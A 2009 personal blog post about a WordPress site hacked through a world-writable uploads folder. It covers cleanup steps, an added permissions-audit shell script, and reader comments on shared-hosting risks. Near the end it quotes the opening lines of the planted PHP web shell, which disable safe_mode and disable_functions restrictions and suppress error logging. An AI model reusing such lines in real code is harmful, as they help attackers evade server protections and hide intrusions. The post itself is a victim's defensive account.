Splash of Style...Macs, Photography, Design, and other Passions

I Was Hacked!

October 2, 2009 by debbie T | WordPress

Eeek! First off, let me say Thank God that I had the WordPress plugin “WordPress File Monitor” installed, because that is what alerted me to the problem. Note to Bart B if you are reading this, heehe, I am glad I wasted my time with that voodoo! 😉

So, I get an email today from the WordPress File Monitor (dated yesterday, I am slow) informing me that a bunch of files were uploaded to one of my other blogs in the “uploads” directory – left as 777 permissions for easy photo uploading.

In the uploads directory, a file named “img1.php” was added, along with a fresh new directory named “2008” with a bunch of sitemap files. (note: I just started this blog in July of 2009, and I have no entries or uploads from 2008, so it was very fishy.)

So, of course my first thought is am I going crazy? Did I somehow upload these files without knowing? At first I didn’t notice the .php file, so I only thought the 2008 sitemap files were added.

I contacted my host, and she assured me that it wasn’t anything too terrible, that it was an everyday, run-of-the-mill spammer. Sneaky spammers! She has seen this sort of thing many times.

She suggested I change my WordPress password and check the database for any extra users. I found no other user accounts, thankfully!

For future reference, I found two articles that list details on how to find and remove any hidden admin users:

http://blog.nachotech.com/?p=125
http://www.studionashvegas.com/wordpress/latest-wordpress-hack-check-your-permalinks-people/

But now I am left puzzled on how they got in!

My WordPress admin password was pretty strong – 15 characters (numerical, upper and lower case letters) and I wasn’t using the default “admin” as my user name either. My host also suggested it might have been from “an exploit via a plugin that isn’t secured against arbitrary remote inclusion/retrieval”.

I am only running 4 plug-ins: Akismet, Hello Dolly, WP Security Scan, and WordPress File Monitor. I did also have the un-updated WordPress Exploit Scanner plug-in, but it was left de-activated. I have since removed it from the plugins folder.

I suppose since I don’t have a secure login, I imagine that possibly my password could have been bypassed? I dunno. I think I might install the Login Lockdown plugin – yeah, Bart more voodoo!

Well, anyway, I am going to really search through my files and make sure everything else is alright.

I found an article that might help me search through the database just in case the spammers attached anything to my posts.

Right now, it doesn’t look like much damage was done. But worst case scenario, I have database backups every night. I can always revert back to one of the older ones and re-create the newer entries I wrote, or I could even export my entries and install a fresh copy of WordPress. We’ll see.

So, be wary of your WordPress blogs! I dunno how they got into mine, but they did, and thankfully I was lucky and it wasn’t too painful!

PS. I took a look at the .php file they added, and one of the first lines of code was $language='ru' (aah, From Russia with love!) But anyway, here is some of the code from the file:

error_reporting(0);
$language='ru';
$auth = 0;
$name='abcdef1234567890abcdef1234567890'; 
$pass='abcdef1234567890abcdef1234567890';
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
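As an added example (not code from the original post or from any of the plugins mentioned), the POSIX shell script below audits an uploads directory for the two symptoms described above: PHP files dropped into wp-content/uploads, and directories writable by every local user, which is what the trailing 7 in 777 grants. It builds a constructed throwaway tree mirroring the incident (a dropped img1.php and a bogus “2008” folder) instead of touching a real site; the function names and sample paths are the example's own.

```shell
#!/bin/sh
# Added example, not code from the original post.
# Audits a WordPress uploads directory for the symptoms described in the post:
# PHP files dropped into wp-content/uploads and directories writable by every
# local user (the trailing 7 in 777). Paths and sample files are constructed.

# List PHP files anywhere under the uploads directory; a photo folder should have none.
find_php_in_uploads() {
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' \) | sort
}

# List directories whose "other" write bit is set (octal mode ..2/..3/..6/..7, e.g. 777).
find_world_writable_dirs() {
    find "$1" -type d -perm -0002 | sort
}

# Tighten to 755 for directories and 644 for files: the owner (which should be
# the account the web server writes uploads as) keeps write access, nobody else does.
fix_upload_perms() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
}

# Build a constructed throwaway tree mirroring the incident: a legitimate
# 2009/07 photo, a dropped img1.php, and a bogus "2008" folder, with 777 dirs.
make_demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/2009/07" "$d/2008"
    chmod 755 "$d/2009" "$d/2009/07"
    touch "$d/2009/07/photo.jpg" "$d/img1.php" "$d/2008/sitemap1.html"
    chmod 777 "$d" "$d/2008"
    echo "$d"
}

demo=$(make_demo_tree)
echo "PHP files under uploads:"
find_php_in_uploads "$demo"
echo "World-writable directories:"
find_world_writable_dirs "$demo"
fix_upload_perms "$demo"
echo "World-writable directories after fix: $(find_world_writable_dirs "$demo" | wc -l | tr -d ' ')"
rm -rf "$demo"
```

Run fix_upload_perms on a real uploads directory only once you know the web server writes uploads as the owner of those files; on a host where PHP runs as a different account, 755 will make photo uploads fail, which is exactly the problem 777 was papering over.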

There are 4 comments

  1. Hi Debbie,

    So sorry to hear you got hacked 🙁 I’m also delighted the damage seems to have been light.

    You say it was in a 777 folder, are you on shared hosting? If so, any other user of that server could have done it. Or, a hacker hacking any account on that server could have also taken you out. On shared hosting 777 is so so dangerous. It forces you to trust all your fellow server-sharers.

    I’m going to take back what I said earlier – if you’re on shared hosting there clearly are benefits to some of these security plugins. Bear in mind though – the attacker could have read your DB details straight out of config.php (they had file-system access since they created files) and used that to disable your plugin. I guess they were thankfully too dumb to do that this time.

    There’s a lot to be said for dedicated or virtual dedicated hosting.

    Bart.

    Comment by Bart B on October 2nd, 2009
  2. Bart, I know you talk about the insecurities of shared hosting, but (and I may be TOTALLY naive about this) I think my host has extra precautions put in place. Or maybe I just don’t know what I am talking about!

    I guess I just don’t understand how one vulnerability can affect other users being “walls” so to speak.

    Do you need to have sudo abilities to do that?

    Sorry for so many questions, but I am really blind when it comes to stuff like this!

    I will email you as well! Thanks Bart!

    Comment by debbie T on October 2nd, 2009
  3. You simply can’t protect from 777. The last 7 is the kicker – it means ALL USERS on the system have read, write, and execute permission.

    Assuming your host is indeed doing something special, it is probably doing php-sudo which means that your PHP scripts run as you, and the other user’s PHP scripts are running as those other users. However, php has to run as A user, and ANY user can write to a 777 folder. So, even if your host is going above and beyond the norm by deploying php-sudo, 777 still defeats it.

    Am I making sense?

    Bart.

    Comment by Bart B on October 2nd, 2009
  4. Hey Bart, I will email you what they told me and you can know for sure!

    I am going to try to keep all my folders away from 777 for now. Just until I can figure it all out.

    Comment by debbie T on October 2nd, 2009